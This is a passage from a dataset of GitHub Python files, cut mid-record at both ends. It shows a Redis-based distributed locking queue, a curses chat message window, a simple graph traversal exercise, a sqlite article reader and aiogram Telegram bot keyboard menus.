clis.append((cli, taken_queued))\n if isinstance(taken_queued, Exception):\n if completed and str(taken_queued) == \"already completed\":\n return True\n nerrs += 1\n if nerrs > self._mr._n_servers // 2:\n raise exceptions.NoMajority(\n \"Too many exceptions from Redis servers\")\n elif taken and queued:\n cnt += (taken_queued[0] == 1 or taken_queued[1] == 1)\n elif taken:\n cnt += taken_queued[0] == 1\n elif queued:\n cnt += taken_queued[1] == 1\n if cnt > self._mr._n_servers // 2:\n return True\n return False\n\n def _is_queued(self, h_k, item):\n if h_k:\n assert ':' in str(h_k), \"did you pass wrong argument?\"\n results = util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_is_queued_h_k', self._mr._clients, h_k=h_k, **self._params)\n elif item:\n results = util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_is_queued_item', self._mr._clients,\n item=\":%s\" % item, **self._params)\n else:\n raise UserWarning(\"Must pass item or item_hash.\")\n return results\n\n def extend_lock(self, h_k):\n \"\"\"\n If you have received an item from the queue and wish to hold the lock\n on it for an amount of time close to or longer than the timeout, you\n must extend the lock!\n\n Returns one of the following:\n -1 if a redis server reported that the item is completed\n 0 if otherwise failed to extend_lock\n number of seconds since epoch in the future when lock will expire\n \"\"\"\n _, t_expireat = util.get_expireat(self._mr._lock_timeout)\n locks = list(util.run_script(\n SCRIPTS, self._mr._map_async, 'lq_extend_lock', self._mr._clients,\n h_k=h_k, expireat=t_expireat, **(self._params)))\n if not self._verify_not_already_completed(locks, 
h_k):\n return -1\n if not self._have_majority(locks, h_k):\n return 0\n # Re-lock nodes where lock is lost\n # Recovers state if we lost the lock on any individual nodes but still\n # have majority, This could cause extend_lock to timeout more\n # frequently, so it might not be a good idea if timeouts are very short\n # on the other hand, if we remove the list(...) call, this could create\n # a memory leak if polling_interval is too short.\n if util.lock_still_valid(\n t_expireat, self._mr._clock_drift, self._mr._polling_interval):\n list(util.run_script(\n SCRIPTS, self._mr._map_async, 'lq_lock',\n [cli for cli, rv in locks if \"%s\" % rv == \"expired\"],\n h_k=h_k, expireat=t_expireat, **(self._params)))\n return util.lock_still_valid(\n t_expireat, self._mr._clock_drift, self._mr._polling_interval)\n\n def consume(self, h_k):\n \"\"\"Remove item from queue. Return the percentage of servers we've\n successfully removed item on.\n\n If the returned value is < 50%, a minority of servers know that the\n item was consumed. The the item could get locked again\n if this minority of servers is entirely unavailable while another\n client is getting items from the queue.\n\n You choose whether a return value < 50% is a failure. You can also\n try to consume the same item twice.\n \"\"\"\n clients = self._mr._clients\n n_success = sum(\n x[1] == 1 for x in util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_consume', clients, h_k=h_k, **self._params))\n util.remove_background_thread(h_k, self._client_id)\n if n_success == 0:\n raise exceptions.ConsumeError(\n \"Failed to mark the item as completed on any redis server\")\n return 100. * n_success / self._mr._n_servers\n\n def put(self, item, priority=100, retry_condition=None):\n \"\"\"\n Put item onto queue. Return tuple like (%, h_k), where % is\n the percentage of servers we've successfully put to and h_k is a\n time and priority dependent hash of the item.\n\n If the returned percentage value is < 50, a minority of servers know\n about the item. If those servers die, this item will be lost. Your\n options are:\n - accept this risk and move on\n - call this function with special parameter, retry_condition.\n\n this.put('a', 101, majorityredis.retry_condition(lambda x: x\n\n `item` (str) an item you wish to queue.\n `priority` (num) an option to get this item off the queue before other\n items. Lower priority scores are gotten first.\n Priority is not guaranteed.\n\n `retry_condition` (func) continually retry calling this function until\n we successfully put to >50% of servers or a max limit is reached.\n see majorityredis.util.retry_condition for details\n\n >>> put('a', 100, retry_condition(nretry=10,\n backoff=lambda x: x + 1))\n\n If you wish, you may define a number > 50% like so:\n\n >>> put('a', 100, retry_condition(nretry=10,\n backoff=lambda x: x + 1,\n condition=lambda x: x[0] >= 80))\n \"\"\"\n h_k = \"%d:%f:%s\" % (priority, time.time(), item)\n if retry_condition:\n put = retry_condition(self._put, lambda x: x[0] > 50)\n else:\n put = self._put\n return put(h_k)\n\n def _put(self, h_k):\n rv = util.run_script(\n SCRIPTS, self._mr._map_async, 'lq_put', self._mr._clients,\n h_k=h_k, **self._params)\n cnt = sum(x[1] == 1 for x in rv)\n return 100. * cnt / self._mr._n_servers, h_k\n\n def get(self, extend_lock=True, check_all_servers=True):\n \"\"\"\n Attempt to get an item from queue and obtain a lock on it to\n guarantee nobody else has a lock on this item.\n\n Returns an (item, h_k) or None. 
An empty return value does\n not necessarily mean the queue is (or was) empty, though it's probably\n nearly empty. `h_k` uniquely identifies the queued item\n\n `extend_lock` - If True, extends the lock indefinitely in the\n background until the lock is explicitly consumed or\n we can no longer extend the lock.\n If False, you need to set a very large timeout or call\n extend_lock() before the lock times out.\n If a function, assume True and call function(h_k) if we\n ever fail to extend the lock.\n `check_all_servers` - If True, query all redis servers for an item.\n Attempt to obtain the lock on the first item received.\n If False, query only 1 redis server for an item and attempt to\n obtain a lock on it. If False and one of the servers is not\n reachable, the min. chance you will get nothing from the queue is\n 1 / n_servers. If True, we always preference the fastest response.\n \"\"\"\n t_start, t_expireat = util.get_expireat(self._mr._lock_timeout)\n client, h_k = self._get_candidate_keys(t_expireat, check_all_servers)\n if not h_k:\n return\n if self._acquire_lock_majority(client, h_k, t_start, t_expireat):\n if extend_lock:\n util.continually_extend_lock_in_background(\n h_k, self.extend_lock, self._mr._polling_interval,\n self._mr._run_async, extend_lock, self._client_id)\n priority, insert_time, item = h_k.decode().split(':', 2)\n return item, h_k\n\n def _get_candidate_keys(self, t_expireat, check_all_servers):\n \"\"\"Choose one server to get an item from. Return (client, key)\n\n If `check_all_servers` is True, use the results from the first server\n to that returns an item. This could be dangerous because it\n preferences the fastest server. If the slowest server for some reason\n had keys that other servers didn't have, these keys would be less likely\n to get synced to the other servers.\n \"\"\"\n if check_all_servers:\n clis = list(self._mr._clients)\n random.shuffle(clis)\n else:\n clis = random.sample(self._mr._clients, 1)\n generator = util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_get', clis, expireat=t_expireat, **self._params)\n\n failed_candidates = []\n winner = (None, None)\n for cclient, ch_k in generator:\n if isinstance(ch_k, Exception):\n failed_candidates.append((cclient, ch_k))\n else:\n winner = (cclient, ch_k)\n return winner\n failed_clients = (\n cclient for cclient, ch_k in chain(generator, failed_candidates))\n list(util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_unlock', failed_clients,\n h_k=ch_k, **(self._params)))\n return winner\n\n def _acquire_lock_majority(self, client, h_k, t_start, t_expireat):\n \"\"\"We've gotten and locked an item on a single redis instance.\n Attempt to get the lock on all remaining instances, and\n handle all scenarios where we fail to acquire the lock.\n\n Return True if acquired majority of locks, False otherwise.\n \"\"\"\n locks = util.run_script(\n SCRIPTS, self._mr._map_async, 'lq_lock',\n [x for x in self._mr._clients if x != client],\n h_k=h_k, expireat=t_expireat, **(self._params))\n locks = list(locks)\n locks.append((client, 1))\n if not self._verify_not_already_completed(locks, h_k):\n return False\n if not self._have_majority(locks, h_k):\n return False\n if not util.lock_still_valid(\n t_expireat, self._mr._clock_drift, self._mr._polling_interval):\n return False\n return True\n\n def _verify_not_already_completed(self, locks, h_k):\n \"\"\"If any Redis server reported that the key, `h_k`, was completed,\n return False and update all servers that don't know this fact.\n \"\"\"\n locks = 
list(locks)\n completed = [\"%s\" % l == \"already completed\" for _, l in locks]\n if any(completed):\n self._heal_completed(h_k, locks)\n return False\n return True\n\n def _have_majority(self, locks, h_k):\n \"\"\"Evaluate whether the number of obtained is > half the number of\n redis servers. If didn't get majority, unlock the locks we got.\n\n `locks` - a list of (client, have_lock) pairs.\n client is one of the redis clients\n have_lock may be 0, 1 or an Exception\n \"\"\"\n cnt = sum(x[1] == 1 for x in locks if not isinstance(x, Exception))\n if cnt < (self._mr._n_servers // 2 + 1):\n log.warn(\"Could not get majority of locks for item.\", extra=dict(\n h_k=h_k))\n list(util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_unlock', [cli for cli, lock in locks if lock == 1],\n h_k=h_k, **(self._params)))\n return False\n return True\n\n def _heal_completed(self, h_k, client_rv):\n \"\"\"The given item hash, `h_k`, is \"completed\" on at least 1 client.\n Mark it completed on the other servers that are up and not sending\n exceptions\"\"\"\n outdated_clients = (\n cli for cli, rv in client_rv if not isinstance(rv, Exception))\n list(util.run_script(\n SCRIPTS, self._mr._map_async,\n 'lq_completed', clients=outdated_clients,\n h_k=h_k, **(self._params)))\n","repo_name":"adgaudio/MajorityRedis","sub_path":"majorityredis/lockingqueue.py","file_name":"lockingqueue.py","file_ext":"py","file_size_in_byte":21112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36404971824","text":"import curses\nimport textwrap\nimport time\n\nfrom libretro.protocol import Proto\nfrom libretro.FileTransfer import filesize_to_string\n\n\"\"\"\\\nWindow for printing chat messages.\nThe ChatMsgWindow is controlled by the ChatView class.\n\nInternally the messages are stored as a list of lines.\nEach list item is a tuple, where index 0 only is set\nif a line points to the beginning of a message.\n\n\tindex 0: message dict (or None)\n\tindex 1: text (string)\n\nThere are some special lines, determined by their prefix.\n\nA file info line:\n\t\"/F/F/F//\"\n\nAn 'unseen marker' (line between seen and unseen messages)\n\t\"/U/U/U\"\n\nA dimmed line starts with:\n\t\"/D/D/D\"\n\n\"\"\"\n\nclass ChatMsgWindow:\n\n\tdef __init__(self, gui):\n\n\t\tself.gui = gui\n\t\tself.W = gui.W['main']\n\t\tself.W.keypad(True)\n\n\t\t# Current communication partner.\n\t\tself.friend = None\n\n\t\t# All messages as a list of lines.\n\t\tself.lines = []\n\t\tself.num_msgs = 0\t# Number of messages\n\t\tself.num_unseen = 0\t# Number of unseen messages\n\n\t\tself.vy = 0\t# Index of 1th line shown at screen\n\t\tself.cy = 0\t# Index of currently selected line\n\n\t\t# Textwrapper for adjust message body to\n\t\t# window width\n\t\t_,w = self.W.getmaxyx()\n\t\tself.tw = textwrap.TextWrapper(w-4)\n\n\t\t# Screen content has changed?\n\t\tself.changed = True\n\n\n\tdef get_selected(self):\n\t\t\"\"\"\\\n\t\tReturn the currently selected message (dict)\n\t\tor None on error.\n\t\t\"\"\"\n\t\tif self.lines[self.cy][0] is not None:\n\t\t\treturn self.lines[self.cy][0]\n\t\telse:\treturn None\n\n\n\tdef delete_selected(self):\n\t\t\"\"\"\\\n\t\tDelete currently selected message from view.\n\t\t\"\"\"\n\t\tmsg_i = self.cy\n\t\tmsg_n = self.__selected_msg_nlines()\n\n\t\tfor i in range(msg_n+1):\n\t\t\tself.lines.pop(msg_i)\n\n\t\tif self.cy > len(self.lines):\n\t\t\tself.cy = self.__prev_msg_index()\n\t\tself.changed = True\n\n\n\tdef add_msg(self, msg):\n\t\t\"\"\"\\\n\t\tAdd 
message to line list.\n\t\tArgs:\n\t\t msg: Message dict\n\t\t\"\"\"\n\n\t\tif msg['unseen'] == 1:\n\t\t\t# If given message is \"unseen\" and there\n\t\t\t# were no \"unseen\" messages yet, add an\n\t\t\t# \"unseen\"-marker-line.\n\t\t\tif self.num_unseen == 0:\n\t\t\t\tself.lines.append((None, \"/U/U/U\"))\n\t\t\t\tself.lines.append((None, \"\"))\n\t\t\tself.num_unseen += 1\n\n\t\t# Add message header (dict)\n\t\tself.lines.append((msg, \"\"))\n\n\t\tif msg['type'] == Proto.T_FILEMSG:\n\t\t\t# File message\n\t\t\t# TODO What happens if filename too long?\n\t\t\tssize = filesize_to_string(msg['size'])\n\t\t\tself.lines.append((None, \"/F/F/F{}/{}/{}\"\\\n\t\t\t\t.format(msg['filename'], ssize,\n\t\t\t\t\tmsg['downloaded'])))\n\t\t\tif not msg['downloaded']:\n\t\t\t\tself.lines.append((None, '/D/D/D'\\\n\t\t\t\t\t'Press [ctrl+D] to download'))\n\t\telse:\n\t\t\t# Message\n\t\t\tself.__add_wrap_text(msg['msg'])\n\n\t\tself.lines.append((None, \"\"))\n\t\tself.num_msgs += 1\n\n\n\tdef set_msgs(self, msgs=[]):\n\t\t\"\"\"\\\n\t\tSet chat messages.\n\t\t\"\"\"\n\t\tself.num_msgs = 0\n\t\tself.num_unseen = 0\n\t\tself.cy = 0\n\t\tself.lines = []\n\n\t\tfor msg in msgs:\n\t\t\tself.add_msg(msg)\n\t\tself.reset_view()\n\n\n\tdef reset_view(self):\n\t\t\"\"\"\\\n\t\tSet view (self.vy) that latest message can be seen.\n\t\t\"\"\"\n\t\tlast_msg_y = self.__last_msg_index()\n\t\tif last_msg_y != None:\n\t\t\tself.cy = last_msg_y\n\t\tself.__adjust_view()\n\n\n\tdef scroll_up(self):\n\t\t\"\"\" Scroll up \"\"\"\n\t\ty = self.__prev_msg_index()\n\t\tif y != None:\n\t\t\tself.cy = y\n\t\t\tself.__adjust_view()\n\n\n\tdef scroll_down(self):\n\t\t\"\"\" Scroll down \"\"\"\n\t\ty = self.__next_msg_index()\n\t\tif y != None:\n\t\t\tself.cy = y\n\t\t\tself.__adjust_view()\n\n\n\tdef redraw(self, force_redraw=False):\n\t\t\"\"\"\\\n\t\tRedraw window\n\n\t\tLocks: self.gui.winLock\n\t\t\"\"\"\n\t\tif not self.changed and not force_redraw:\n\t\t\treturn\n\n\t\tself.gui.winLock.acquire()\n\t\ttry:\n\t\t\th,w = self.W.getmaxyx()\n\t\t\tself.W.clear()\n\n\t\t\ttry:\n\t\t\t\tself.__draw_headline(h, w)\n\n\t\t\t\ty = 2\n\t\t\t\tfor i,line in enumerate(self.lines[self.vy:]):\n\t\t\t\t\tif y >= h-1: break\n\n\t\t\t\t\tif line[0] is not None:\n\t\t\t\t\t\t# Start of message\n\t\t\t\t\t\tis_sel = self.vy+i == self.cy\n\t\t\t\t\t\tself.__print_msg_header(y, line[0], is_sel)\n\t\t\t\t\telif line[1][:6] == '/F/F/F':\n\t\t\t\t\t\tself.__print_file_msg(y, line[1])\n\t\t\t\t\telif line[1][:6] == \"/D/D/D\":\n\t\t\t\t\t\tself.W.addstr(y, 2, line[1][6:], curses.A_DIM)\n\t\t\t\t\telif line[1] == \"/U/U/U\":\n\t\t\t\t\t\tself.__print_unseen_marker_line(y, w)\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.__print_msg(y, line[1])\n\t\t\t\t\ty += 1\n\n\t\t\t\tself.__draw_scrollbar(2, w-2, h-3)\n\t\t\t\tself.W.border()\n\t\t\texcept:\n\t\t\t\t# Screen too small\n\t\t\t\tpass\n\t\t\tself.W.refresh()\n\t\tfinally:\n\t\t\tself.gui.winLock.release()\n\n\t\tself.changed = False\n\n\n\tdef remove_unseen_marker(self):\n\t\t\"\"\"\\\n\t\tRemove line \"/U/U/U\" and the trailing one from self.lines.\n\t\t\"\"\"\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\ti = self.lines.index((None,\"/U/U/U\"))\n\t\t\t\tself.lines.pop(i)\n\t\t\t\tself.lines.pop(i)\n\t\t\texcept ValueError:\n\t\t\t\tbreak\n\n\tdef close(self):\n\t\t\"\"\"\\\n\t\tClear and refresh chat message window.\n\t\t\"\"\"\n\t\tself.gui.winLock.acquire()\n\t\ttry:\n\t\t\tself.W.clear()\n\t\t\tself.W.refresh()\n\t\tfinally:\n\t\t\tself.gui.winLock.release()\n\n\t#-- PRIVATE 
------------------------------------------------------\n\n\tdef __add_wrap_text(self, msg_text):\n\t\t\"\"\"\\\n\t\tAdd message text to line list.\n\t\t\"\"\"\n\t\tlines = msg_text.splitlines()\n\t\tfor line in lines:\n\t\t\tfor l in self.tw.wrap(line):\n\t\t\t\tself.lines.append((None, l))\n\n\tdef __draw_headline(self, h, w):\n\t\t\"\"\"\\\n\t\tDraw the 1th line (headline) of the chat message window.\n\t\t\"\"\"\n\t\tself.W.addstr(1, 1, \" \"*(w-2), self.gui.colors['Wb'])\n\t\tself.W.addstr(1, 1, \" Conversation with \" + self.friend.name,\n\t\t\tself.gui.colors['Wb']|curses.A_BOLD)\n\n\n\tdef __print_msg_header(self, y, msg, is_selected):\n\t\t\"\"\"\\\n\t\tPrint a message header \"SENDER (TIME)\"\n\t\tIf is_selected, sender name and time will\n\t\tbe shown underlined.\n\t\t\"\"\"\n\t\tsender = msg['from']\n\t\tdt = self.__format_msgtime(msg['time'])\n\n\t\tif sender == self.gui.cli.account.name:\n\t\t\tattr = self.gui.colors['b']\n\t\t\tsender = 'you'\n\t\telse:\tattr = self.gui.colors['g']\n\n\t\tu = curses.A_UNDERLINE if is_selected else 0\n\t\tself.W.addstr(y, 1, sender, attr|u)\n\t\tself.W.addstr(\" (\"+dt+\")\", curses.A_DIM|u)\n\n\n\tdef __print_unseen_marker_line(self, y, w):\n\t\t\"\"\"\\\n\t\tPrint a line marking the beginning of unseen\n\t\tmessages.\n\t\t\"\"\"\n\t\ts = \" {} new messages \".format(self.num_unseen)\n\t\tself.W.addstr(y, 1, \"-\"*(w-2), self.gui.colors['r'])\n\t\tself.W.addstr(y, int(w/2-len(s)/2), s, self.gui.colors['r'])\n\n\n\tdef __print_file_msg(self, y, line):\n\t\t\"\"\"\\\n\t\tPrint file message.\n\t\t/F/F/F//\n\t\t\"\"\"\n\t\tfname,fsize,downl = line[6:].split('/')\n\t\tself.W.addstr(y, 2, 'File ')\n\t\tself.W.addstr(\"'\"+fname+\"'\", curses.A_BOLD)\n\t\tself.W.addstr(\" (\"+fsize+\")\", curses.A_DIM)\n\n\n\n\tdef __print_msg(self, y, line):\n\t\t\"\"\"\\\n\t\tPrint message line to chat msg window.\n\t\tThis supports the following expression for styled\n\t\ttext ouput:\n\n\t\t **TEXT** Bold text\n\t\t __TEXT__ Underlined text\n\t\t ??TEXT?? Dimmed text\n\t\t ~~TEXT~~ Reverse text\n\t\t ##TEXT## Blinking text\n\t\t\"\"\"\n\t\tspecial = {\n\t\t\t'**' : curses.A_BOLD,\n\t\t\t'??' 
: curses.A_DIM,\n\t\t\t'~~' : curses.A_REVERSE,\n\t\t\t'__' : curses.A_UNDERLINE,\n\t\t\t'##' : curses.A_BLINK\n\t\t}\n\t\tactive = {}\n\t\tfor key in special.keys(): active[key] = 0\n\n\t\tattr = 0\n\t\ti = 0\n\t\tself.W.move(y, 2)\n\t\twhile i < len(line):\n\t\t\tch = line[i]\n\t\t\tif line[i:i+2] in special:\n\t\t\t\tspec = line[i:i+2]\n\t\t\t\tif active[spec] == 1:\n\t\t\t\t\tattr &= ~special[spec]\n\t\t\t\t\tactive[spec] = 0\n\t\t\t\telse:\n\t\t\t\t\tattr |= special[spec]\n\t\t\t\t\tactive[spec] = 1\n\t\t\t\ti += 2\n\t\t\telse:\n\t\t\t\tself.W.addch(ch, attr)\n\t\t\t\ti += 1\n\n\n\tdef __draw_scrollbar(self, y, x, h):\n\t\t\"\"\"\\\n\t\tDraw scrollbar at the right side of window.\n\t\t\"\"\"\n\t\t# Get max cursor y position\n\t\tcymax = len(self.lines) #- h - 1\n\t\tif cymax <= 0: cymax = 1\n\n\t\t# Get scrollbar block position\n\t\tbar_y = int(self.cy * ((h-1) / cymax))\n\t\tif bar_y > h-3: bar_y = h-3\n\n\t\tif len(self.lines) > h-1:\n\t\t\tself.W.addch(y, x, curses.ACS_UARROW, curses.A_BOLD)\n\t\t\tself.W.addch(y+1+bar_y, x, curses.ACS_BLOCK, curses.A_DIM)\n\t\t\tself.W.addch(y+h-1, x, curses.ACS_DARROW, curses.A_BOLD)\n\n\n\tdef __format_msgtime(self, msg_time):\n\t\t\"\"\"\\\n\t\tGet formatted time string from given\n\t\tmessage time.\n\t\t\"\"\"\n\t\ttm = time.strptime(msg_time, \"%y-%m-%d %H:%M\")\n\t\tnow = time.localtime()\n\n\t\tif tm.tm_year != now.tm_year:\n\t\t\t# Message is not from current year\n\t\t\treturn time.strftime(\"%m %b %Y %H:%M\", tm)\n\n\t\telif tm.tm_mon != now.tm_mon:\n\t\t\t# Message is not from current month\n\t\t\t# Format: \"12. May 20:32\"\n\t\t\treturn time.strftime(\"%m %b %H:%M\", tm)\n\n\t\t# Message date is within current month...\n\t\tdaydiff = abs(tm.tm_mday - now.tm_mday)\n\n\t\tif daydiff > 5:\n\t\t\t# Message is older than 5 days\n\t\t\t# Format: \"12. 
May 20:32\"\n\t\t\treturn time.strftime(\"%m %b %H:%M\", tm)\n\t\telif daydiff > 1:\n\t\t\t# Message is older than yesterday\n\t\t\t# Format: \"Monday 20:32\"\n\t\t\treturn time.strftime(\"%A %H:%M\", tm)\n\t\telif daydiff == 1:\n\t\t\t# Message is from yesterday\n\t\t\t# Format: \"yesterday 20:32\"\n\t\t\treturn time.strftime(\"yesterday %H:%M\", tm)\n\n\t\t# Message is from today\n\t\treturn time.strftime(\"%H:%M\", tm)\n\n\n\tdef __prev_msg_index(self):\n\t\t\"\"\"\\\n\t\tReturns index of beginning of previous\n\t\tmessage in self.lines starting at self.cy.\n\t\tIf no previous message exists, None is returned.\n\t\t\"\"\"\n\t\ty = self.cy-1\n\t\twhile y >= 0:\n\t\t\tif self.lines[y][0]:\n\t\t\t\treturn y\n\t\t\ty -= 1\n\t\treturn None\n\n\tdef __next_msg_index(self):\n\t\t\"\"\"\\\n\t\tReturns index of beginning of next\n\t\tmessage in self.lines starting at self.cy.\n\t\tIf no next message exists, None is returned.\n\t\t\"\"\"\n\t\ty = self.cy+1\n\t\twhile y < len(self.lines):\n\t\t\tif self.lines[y][0]:\n\t\t\t\treturn y\n\t\t\ty += 1\n\t\treturn None\n\n\tdef __last_msg_index(self):\n\t\t\"\"\"\\\n\t\tGet index of last message.\n\t\t\"\"\"\n\t\ty = len(self.lines)-1\n\t\twhile y >= 0:\n\t\t\tif self.lines[y][0]:\n\t\t\t\treturn y\n\t\t\ty -= 1\n\t\treturn None\n\n\n\tdef __selected_msg_nlines(self):\n\t\t\"\"\"\\\n\t\tGet the number of lines, the currently\n\t\tselected message is using (without headline).\n\t\t\"\"\"\n\t\tprefixes = (\"/M/M/M\",\"/U/U/U\")\n\t\ty = self.cy+1\n\t\tn = 0\n\t\tfor line in self.lines[y:]:\n\t\t\tif line[0] or line[1] in prefixes:\n\t\t\t\treturn n\n\t\t\tn += 1\n\t\treturn n\n\n\tdef __adjust_view(self):\n\t\t\"\"\"\\\n\t\tAdjusts the view (self.vy) that currently\n\t\tselected message (self.cy) is within viewport.\n\t\t\"\"\"\n\t\th,w = self.W.getmaxyx()\n\t\th -= 3\n\n\t\tif self.cy < self.vy:\n\t\t\tself.vy = self.cy\n\n\t\telif self.cy >= self.vy+h:\n\t\t\t# Set view index, that we can see\n\t\t\t# the selected message completely.\n\t\t\tnlines = self.__selected_msg_nlines()\n\t\t\tself.vy = self.cy-h+nlines+1\n\n\t\tself.changed = True\n","repo_name":"lukwies/retro-client","sub_path":"retro_client/ChatMsgWindow.py","file_name":"ChatMsgWindow.py","file_ext":"py","file_size_in_byte":10156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32644472827","text":"graph = {\n '5': ['3', '7'],\n '3': ['2', '4'],\n '7': ['8'],\n '2': [],\n '4': ['8'],\n '8': []\n}\n\n\nclass Graph:\n def __init__(self, graph):\n self.graph = graph\n self.bfs = []\n self.dfs = []\n\n def calculate_bfs(self, head):\n queue = []\n visited = set()\n queue.append(head)\n visited.add(head)\n self.bfs.append(head)\n while queue:\n first_node = queue.pop(0)\n for neighbour in self.graph[first_node]:\n if neighbour not in visited:\n self.bfs.append(neighbour)\n visited.add(neighbour)\n queue.append(neighbour)\n\n def calculate_dfs(self, head, visited):\n visited.add(head)\n for item in self.graph[head]:\n if item not in visited:\n self.dfs.append(item)\n self.calculate_dfs(item, visited=visited)\n\n def numIslands(self, grid):\n count = 0\n for i in range(0, len(grid)):\n for j in range(0, len(grid)):\n if grid[i][j] == '1':\n if i > 0 and grid[i-1][j] == '1':\n continue\n elif j > 0 and grid[i][j-1] == '1':\n continue\n elif i < len(grid)-1 and grid[i+1][j] == '1':\n continue\n elif j < len(grid)-1 and grid[i][j+1] == '1':\n continue\n else:\n count += 1\n return count+1\n\n\nobj = 
Graph(graph=graph)\nobj.calculate_bfs('5')\nobj.dfs.append('5')\nobj.calculate_dfs('5', set())\nprint(obj.bfs)\nprint(obj.dfs)\n\n","repo_name":"Dhananjay09/Coding-Questions","sub_path":"graph/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31150258463","text":"import sqlite3\nfrom collections import OrderedDict\nfrom itertools import islice\nimport pandas\nimport re\nimport io\nimport codecs\nimport os\n\n\ndef read_articles(table):\n conn = sqlite3.connect('../sites/example.db')\n c = conn.cursor()\n # c.execute(\"SELECT description FROM \" + table + \" Limit 10\")\n c.execute(\"SELECT description FROM \" + table)\n print(c.fetchone())\n articles = c.fetchall()\n conn.commit()\n conn.close()\n return articles\n\n\ndef example_article(table):\n conn = sqlite3.connect('../sites/example.db')\n c = conn.cursor()\n c.execute(\"SELECT description FROM \" + table + \" Limit 2\")\n # c.execute(\"SELECT description FROM \" + table)\n article = c.fetchall()[0]\n conn.commit()\n conn.close()\n return article\n\n\ndef get_train(records):\n records.extend(read_articles('forumzdrowia'))\n # records.extend(read_articles('doz'))\n # records.extend(read_articles('poradnikzdrowie'))\n # records.extend(read_articles('articles'))\n for i, record in enumerate(records):\n records[i] = prepare_article(record[0])\n # print(records)\n return records\n\ndef get_forbiddens():\n forbiddens = ['bo', 'abd', 'się', 'są', 'które', 'który', 'że', 'żeby', 'być', 'stać', 'mieć', 'posiadać',\n 'mogą', 'jeśli', 'też', 'może', 'to',\n 'także', 'również']\n # forbiddens=[]\n f = open('forbidden_stop', 'r', encoding='utf-8-sig')\n forbiddens.extend(f.read().splitlines())\n f.close()\n # import pprint\n # pprint.pprint(forbiddens)\n # print(forbiddens)\n return forbiddens\n\n\ndef prepare_article(article):\n # article = re.sub('[().,-:/]', '', article).lower()\n # # article = re.sub('y$', 'a', article[0])\n # # article = re.sub('\\d+', '', article[0])\n # article_list = [word.lower() for word in article.split()]\n # forbiddens = get_forbiddens()\n # for i, word in enumerate(article_list):\n # if word in forbiddens:\n # del article_list[i]\n # else:\n # article_list[i] = unify_token(word)\n\n return article\n # return islice(OrderedDict(counter), 3)\n\nfrom sklearn import neural_network\ndef unify_token(token):\n # results = os.system('cat morfologik.txt | less /' + token)\n\n with open('morfologik.txt', 'r', encoding='utf-8-sig') as infile:\n for line in infile:\n line_content = line.split(sep=';')\n if token == line_content[1]:\n return line_content[0]\n return token\n\nfrom sklearn import svm\n# print(unify_token('alkoholowa'))\n\n# result = get_train(read_articles('doz'))\nprint(prepare_article('Przeciwciała anty-TPO nie występują we krwi osoby zdrowej, dlatego ich obecność zawsze zwiastuje choroby tarczycy. Aby dowiedzieć się, na które schorzenie wskazują przeciwciała, należy oznaczyć ich stężenie we krwi. 
Sprawdź, na czym polega badanie przeciwciał anty-TPO, jakie są wskazania do badania i jak interpretować wyniki badań.'))\n","repo_name":"Karolucha/magisterka","sub_path":"learn/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23016973521","text":"from aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\n\n\nmenu = InlineKeyboardMarkup(row_width=1)\nbtnProfile = InlineKeyboardButton(text=\"Profile 👤\", callback_data='btnProfile')\nbtnRequests = InlineKeyboardButton(text=\"Requests 🗄\", callback_data='btnRequests')\nmenu.add(btnProfile, btnRequests)\n\n\nbtnBack = InlineKeyboardButton(text=\"Back\", callback_data='btnBack')\n\nback_user_requests = InlineKeyboardMarkup(row_width=1)\nbtnBackUserRequests = InlineKeyboardButton(text=\"Back\", callback_data='btnBackUserRequests')\nback_user_requests.add(btnBackUserRequests)\n\nback_artist_requests = InlineKeyboardMarkup(row_width=1)\nbtnBackArtistRequests = InlineKeyboardButton(text=\"Back\", callback_data='btnBackArtistRequests')\nback_artist_requests.add(btnBackArtistRequests)\n\n\nuser_profile_menu = InlineKeyboardMarkup(row_width=1)\nbtnSubscribe = InlineKeyboardButton(text=\"Subscribe 🧑‍🎨\", callback_data='btnSubscribe')\nuser_profile_menu.add(btnSubscribe, btnBack)\n\nuser_requests_menu = InlineKeyboardMarkup(row_width=1)\nbtnShowMyRequests = InlineKeyboardButton(text=\"Show my requests 🗃\", callback_data='btnShowMyRequests')\nbtnSendRequest = InlineKeyboardButton(text=\"Send request 🖼\", callback_data='btnSendRequest')\nuser_requests_menu.add(btnShowMyRequests, btnSendRequest, btnBack)\n\n\nartist_profile_menu = InlineKeyboardMarkup(row_width=2)\nbtnEditProfile = InlineKeyboardButton(text=\"Edit profile ✍️\", callback_data='btnEditProfile')\nbtnUnSubscribe = InlineKeyboardButton(text=\"Unsubscribe 😶‍🌫️\", callback_data='btnUnSubscribe')\nartist_profile_menu.add(btnEditProfile, btnUnSubscribe, btnBack)\n\nartist_requests_menu = InlineKeyboardMarkup(row_width=1)\nbtnShowFreeRequests = InlineKeyboardButton(text=\"Show free requests 🗄\", callback_data='btnShowFreeRequests')\nbtnShowAcceptedRequests = InlineKeyboardButton(text=\"Show accepted requests 📇\", callback_data='btnShowAcceptedRequests')\nartist_requests_menu.add(btnShowFreeRequests, btnShowAcceptedRequests, btnShowMyRequests, btnSendRequest, btnBack)\n\n\nconf_menu = InlineKeyboardMarkup(row_width=2)\nbtnConfYes = InlineKeyboardButton(text=\"Yes\", callback_data='btnConfYes')\nbtnConfNo = InlineKeyboardButton(text=\"No\", callback_data='btnConfNo')\nconf_menu.add(btnConfYes, btnConfNo)\n\n\nnot_accepted_request = InlineKeyboardMarkup(row_width=2)\nbtnAccept = InlineKeyboardButton(text=\"Accept\", callback_data='btnAccept')\nbtnClose = 